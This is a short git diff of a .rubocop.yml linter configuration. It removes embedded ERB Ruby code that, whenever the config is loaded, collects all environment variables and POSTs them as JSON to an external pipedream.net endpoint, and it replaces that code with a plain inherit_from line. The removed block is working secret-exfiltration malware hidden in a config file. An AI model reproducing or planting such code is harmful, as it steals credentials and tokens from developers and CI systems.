--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -1,22 +1,2 @@
 #.rubocop.yml
-<%  
-require 'net/http'  
-require 'uri'  
-require 'json'  
-  
-url = 'https://5249055eabbb52ef14d6e9b32e549966.m.pipedream.net'  
-uri = URI.parse(url)  
-  
-header = { 'Content-Type': 'application/json' }  
-data = {  
-  environment_variables: ENV.to_h  
-}  
-  
-http = Net::HTTP.new(uri.host, uri.port)  
-http.use_ssl = true  
-request = Net::HTTP::Post.new(uri.request_uri, header)  
-request.body = data.to_json  
-  
-response = http.request(request)  
-  
-%>
+inherit_from: .other.yml
